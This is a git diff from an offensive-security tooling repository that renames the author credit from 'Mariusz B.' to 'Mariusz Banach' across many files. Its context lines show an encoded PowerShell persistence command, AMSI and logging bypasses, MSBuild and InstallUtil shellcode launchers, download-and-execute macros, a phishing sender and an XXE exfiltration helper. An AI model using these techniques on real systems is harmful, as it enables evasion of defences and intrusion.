# Mariusz B. / mgeeky, '21
|
# Mariusz Banach / mgeeky, '21
|
||||||
# <mb [at] binary-offensive.com>
|
# <mb [at] binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -37,7 +37,7 @@ PS > py .\gophish-send-mail.py .\send-mail-with-gophish.yaml
|
|||||||
|
|
||||||
:: GoPhish Single Mail Send utility
|
:: GoPhish Single Mail Send utility
|
||||||
Helping you embellish your emails by sending them one-by-one
|
Helping you embellish your emails by sending them one-by-one
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
|
|
||||||
[+] Template to use:
|
[+] Template to use:
|
||||||
ID: 22
|
ID: 22
|
||||||
|
@ -165,7 +165,7 @@ def main(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: GoPhish Single Mail Send utility
|
:: GoPhish Single Mail Send utility
|
||||||
Helping you embellish your emails by sending them one-by-one
|
Helping you embellish your emails by sending them one-by-one
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
''')
|
''')
|
||||||
|
|
||||||
template = getTemplate()
|
template = getTemplate()
|
||||||
|
@ -205,7 +205,7 @@ def main(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Phishing HTML Linter
|
:: Phishing HTML Linter
|
||||||
Shows you bad smells in your HTML code that will get your mails busted!
|
Shows you bad smells in your HTML code that will get your mails busted!
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
''')
|
''')
|
||||||
|
|
||||||
html = ''
|
html = ''
|
||||||
|
@ -19,7 +19,7 @@
|
|||||||
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
|
' WindowsPersistence "powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater"
|
||||||
'
|
'
|
||||||
' AUTHOR:
|
' AUTHOR:
|
||||||
' Mariusz B. / mgeeky, '17
|
' Mariusz Banach / mgeeky, '17
|
||||||
'
|
'
|
||||||
|
|
||||||
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
||||||
|
@ -100,7 +100,7 @@ function Bypass-CLM
|
|||||||
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
Write-Host "`tAppLocker Constrined Language Mode Bypass via COM"
|
||||||
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
Write-Host "`t(implementation of: @xpn's technique, as documented in:)"
|
||||||
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
Write-Host "`t(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)"
|
||||||
Write-Host "`n`tRe-implemented, enhanced by: Mariusz B., mgeeky"
|
Write-Host "`n`tRe-implemented, enhanced by: Mariusz Banach, mgeeky"
|
||||||
Write-Host "`t-----`n"
|
Write-Host "`t-----`n"
|
||||||
|
|
||||||
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"
|
Write-Host "[.] Step 0. Planted DLL files in:`n`t$dstAssemblyPath`n`t$dstDllPath"
|
||||||
|
File diff suppressed because one or more lines are too long
@ -2,7 +2,7 @@
|
|||||||
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
|
* This DLL hosts CLR4 environment from within a native binary. This way it is possible to
|
||||||
* call .NET APIs from an unmanaged runtime.
|
* call .NET APIs from an unmanaged runtime.
|
||||||
*
|
*
|
||||||
* Mariusz B., mgeeky, 19'
|
* Mariusz Banach, mgeeky, 19'
|
||||||
*
|
*
|
||||||
**/
|
**/
|
||||||
|
|
||||||
|
@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1
|
|||||||
(implementation of: @xpn's technique, as documented in:)
|
(implementation of: @xpn's technique, as documented in:)
|
||||||
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
||||||
|
|
||||||
Re-implemented, enhanced by: Mariusz B., mgeeky
|
Re-implemented, enhanced by: Mariusz Banach, mgeeky
|
||||||
-----
|
-----
|
||||||
|
|
||||||
[.] Step 0. Planted DLL files in:
|
[.] Step 0. Planted DLL files in:
|
||||||
|
@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one
|
|||||||
PS> py .\c3-client.py --help
|
PS> py .\c3-client.py --help
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage:
|
usage:
|
||||||
Usage: ./c3-client.py [options] <host> <command> [...]
|
Usage: ./c3-client.py [options] <host> <command> [...]
|
||||||
@ -59,7 +59,7 @@ optional arguments:
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
|
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
|
usage: Usage: ./c3-client.py [options] <host> <command> [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id]
|
||||||
|
|
||||||
@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds:
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
|
PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Sending a ping every 45 seconds.
|
[.] Sending a ping every 45 seconds.
|
||||||
[.] Pinged relay: matter4 from gateway gate4
|
[.] Pinged relay: matter4 from gateway gate4
|
||||||
@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c
|
|||||||
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
|
PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear
|
||||||
|
|
||||||
:: C3 Client - a lightweight automated companion with C3 voyages
|
:: C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] LDAP: Clearing messages queue...
|
[.] LDAP: Clearing messages queue...
|
||||||
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
|
[+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4
|
||||||
@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve
|
|||||||
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
|
PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: <domain>/<userName>, computer: <computerName>\`""
|
||||||
|
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Entering infinite-loop awaiting for new Relays...
|
[.] Entering infinite-loop awaiting for new Relays...
|
||||||
[+] New Relay checked-in!
|
[+] New Relay checked-in!
|
||||||
@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45
|
|||||||
## Author
|
## Author
|
||||||
|
|
||||||
```
|
```
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
```
|
```
|
||||||
|
@ -2036,7 +2036,7 @@ def parseArgs(argv):
|
|||||||
def main(argv):
|
def main(argv):
|
||||||
print('''
|
print('''
|
||||||
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
:: F-Secure's C3 Client - a lightweight automated companion with C3 voyages
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
parseArgs(argv)
|
parseArgs(argv)
|
||||||
|
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
PS> . .\Count-PrivilegedGroupMembers.ps1
|
PS> . .\Count-PrivilegedGroupMembers.ps1
|
||||||
PS> Count-PrivilegedGroupMembers
|
PS> Count-PrivilegedGroupMembers
|
||||||
|
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
#>
|
#>
|
||||||
|
|
||||||
# This script requires PowerView 3.0 dev branch
|
# This script requires PowerView 3.0 dev branch
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
|
|
||||||
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
|
Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way.
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: None
|
Required Dependencies: None
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
|
|
||||||
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
|
Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way.
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: None
|
Required Dependencies: None
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
files for later processing. This script is compatible with newest PowerView's version,
|
files for later processing. This script is compatible with newest PowerView's version,
|
||||||
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
|
from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets.
|
||||||
|
|
||||||
Author: Mariusz B. (mgeeky), '18
|
Author: Mariusz Banach (mgeeky), '18
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerSploit's Recon.psm1
|
Required Dependencies: PowerSploit's Recon.psm1
|
||||||
#>
|
#>
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#requires -version 2
|
#requires -version 2
|
||||||
|
|
||||||
<#
|
<#
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
@ -12,7 +12,7 @@ function Get-DomainOUTree
|
|||||||
<#
|
<#
|
||||||
.SYNOPSIS
|
.SYNOPSIS
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
@ -65,7 +65,7 @@ function Get-NetOUTree
|
|||||||
<#
|
<#
|
||||||
.SYNOPSIS
|
.SYNOPSIS
|
||||||
|
|
||||||
Author: Mariusz B. (@mgeeky)
|
Author: Mariusz Banach (@mgeeky)
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerView.ps1
|
Required Dependencies: PowerView.ps1
|
||||||
Optional Dependencies: None
|
Optional Dependencies: None
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
PS> . .\Get-UserPasswordEntries.ps1
|
PS> . .\Get-UserPasswordEntries.ps1
|
||||||
PS> Get-UserPasswordEntries
|
PS> Get-UserPasswordEntries
|
||||||
|
|
||||||
Mariusz B. / mgeeky
|
Mariusz Banach / mgeeky
|
||||||
#>
|
#>
|
||||||
|
|
||||||
# This script requires PowerView 3.0 dev branch
|
# This script requires PowerView 3.0 dev branch
|
||||||
|
@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1
|
|||||||
(implementation of: @xpn's technique, as documented in:)
|
(implementation of: @xpn's technique, as documented in:)
|
||||||
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
|
||||||
|
|
||||||
Re-implemented, enhanced by: Mariusz B., mgeeky
|
Re-implemented, enhanced by: Mariusz Banach, mgeeky
|
||||||
-----
|
-----
|
||||||
|
|
||||||
[.] Step 0. Planted DLL files in:
|
[.] Step 0. Planted DLL files in:
|
||||||
@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File not recognized as PE/EXE.
|
[?] File not recognized as PE/EXE.
|
||||||
|
|
||||||
@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
||||||
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
||||||
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
|
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
|
||||||
|
|
||||||
<Target Name="btLDoraXcZV">
|
<Target Name="btLDoraXcZV">
|
||||||
<hwiJYmWvD />
|
<hwiJYmWvD />
|
||||||
@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
|||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File not recognized as PE/EXE.
|
[?] File not recognized as PE/EXE.
|
||||||
|
|
||||||
@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
|
|||||||
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Will load script file: '.\Test2.ps1'
|
[.] Will load script file: '.\Test2.ps1'
|
||||||
[+] AMSI Disabled.
|
[+] AMSI Disabled.
|
||||||
@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so
|
|||||||
PS D:\> .\Stracciatella.exe -v
|
PS D:\> .\Stracciatella.exe -v
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
|
||||||
|
|
||||||
[-] It looks like no script path was given.
|
[-] It looks like no script path was given.
|
||||||
[+] AMSI Disabled.
|
[+] AMSI Disabled.
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
This script launches many PowerView cmdlets and stores their output
|
This script launches many PowerView cmdlets and stores their output
|
||||||
in Clixml files for later processing.
|
in Clixml files for later processing.
|
||||||
|
|
||||||
Author: Mariusz B. (mgeeky), '18
|
Author: Mariusz Banach (mgeeky), '18
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
Required Dependencies: PowerSploit's Recon.psm1
|
Required Dependencies: PowerSploit's Recon.psm1
|
||||||
#>
|
#>
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of downloading a binary file from the URL, saving it to the
|
' Example of downloading a binary file from the URL, saving it to the
|
||||||
' local filesystem and then launching.
|
' local filesystem and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
' Example of dropping an embedded, base64 encoded binary file to the disk,
|
||||||
' decoding it and then launching.
|
' decoding it and then launching.
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' This script uses WMI class' Win32_Process static method Create to
|
' This script uses WMI class' Win32_Process static method Create to
|
||||||
' execute given command in a hidden window (ShowWindow = 12).
|
' execute given command in a hidden window (ShowWindow = 12).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -2,7 +2,7 @@
|
|||||||
' This script uses classic WScript.Shell Run method to
|
' This script uses classic WScript.Shell Run method to
|
||||||
' execute given command in a hidden window (second param = 0)
|
' execute given command in a hidden window (second param = 0)
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
' execute given command in a hidden window via StdIn passed to a dedicated
|
' execute given command in a hidden window via StdIn passed to a dedicated
|
||||||
' launcher command (powershell.exe in this example).
|
' launcher command (powershell.exe in this example).
|
||||||
'
|
'
|
||||||
' Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
' (https://github.com/mgeeky)
|
' (https://github.com/mgeeky)
|
||||||
'
|
'
|
||||||
|
|
||||||
|
@ -12,7 +12,7 @@
|
|||||||
# - raw Shellcode in a separate thread via CreateThread
|
# - raw Shellcode in a separate thread via CreateThread
|
||||||
# - .NET Assembly via Assembly.Load
|
# - .NET Assembly via Assembly.Load
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
|
|||||||
|
|
||||||
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
<!-- Based on Casey Smith work, Twitter: @subTee -->
|
||||||
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
|
||||||
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
|
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
|
||||||
|
|
||||||
<Target Name="$taskName">
|
<Target Name="$taskName">
|
||||||
<$templateName />
|
<$templateName />
|
||||||
@ -584,7 +584,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
|
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
|
||||||
# future use of BloodHound.
|
# future use of BloodHound.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky
|
# Mariusz Banach / mgeeky
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
|
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
|
||||||
|
|
||||||
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
|
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
|
||||||
<!-- Modified by Mariusz B. / mgeeky. -->
|
<!-- Modified by Mariusz Banach / mgeeky. -->
|
||||||
|
|
||||||
<Target Name="MyLittleInlineTaskName">
|
<Target Name="MyLittleInlineTaskName">
|
||||||
<MyLittleInlineTask />
|
<MyLittleInlineTask />
|
||||||
|
@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
|
|||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: .\generateRogueDotNet.py [options] <inputFile>
|
usage: .\generateRogueDotNet.py [options] <inputFile>
|
||||||
|
|
||||||
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
|
|||||||
|
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[?] File specified as raw Shellcode.
|
[?] File specified as raw Shellcode.
|
||||||
|
|
||||||
|
@ -34,7 +34,7 @@
|
|||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -519,7 +519,7 @@ def getSourceFileContents(
|
|||||||
|
|
||||||
/*
|
/*
|
||||||
Author: Casey Smith, Twitter: @subTee
|
Author: Casey Smith, Twitter: @subTee
|
||||||
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
License: BSD 3-Clause
|
License: BSD 3-Clause
|
||||||
|
|
||||||
Step 1: Create Your Strong Name Key -> key.snk
|
Step 1: Create Your Strong Name Key -> key.snk
|
||||||
@ -806,7 +806,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: Rogue .NET Source Code Generation Utility
|
:: Rogue .NET Source Code Generation Utility
|
||||||
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
|
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
|
||||||
Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
|
|
||||||
''')
|
''')
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -31,7 +31,7 @@
|
|||||||
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
|
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
|
||||||
#
|
#
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
@ -132,7 +132,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Blind-XXE attacker's helper backend component
|
:: Blind-XXE attacker's helper backend component
|
||||||
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
|
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
|
||||||
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
#
|
#
|
||||||
# Padding Oracle test-cases generator.
|
# Padding Oracle test-cases generator.
|
||||||
# Mariusz B. / mgeeky, 2016
|
# Mariusz Banach / mgeeky, 2016
|
||||||
# v0.2
|
# v0.2
|
||||||
#
|
#
|
||||||
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
||||||
@ -277,7 +277,7 @@ def hex_dump(data):
|
|||||||
|
|
||||||
def main():
|
def main():
|
||||||
info('\n\tPadding Oracle test-cases generator')
|
info('\n\tPadding Oracle test-cases generator')
|
||||||
info('\tMariusz B. / mgeeky, 2016\n')
|
info('\tMariusz Banach / mgeeky, 2016\n')
|
||||||
|
|
||||||
if len(sys.argv) < 2:
|
if len(sys.argv) < 2:
|
||||||
warning('usage: padding-oracle-tests.py <data> [blocksize]')
|
warning('usage: padding-oracle-tests.py <data> [blocksize]')
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
* to add forced redirection to the target site.
|
* to add forced redirection to the target site.
|
||||||
*
|
*
|
||||||
* Authors:
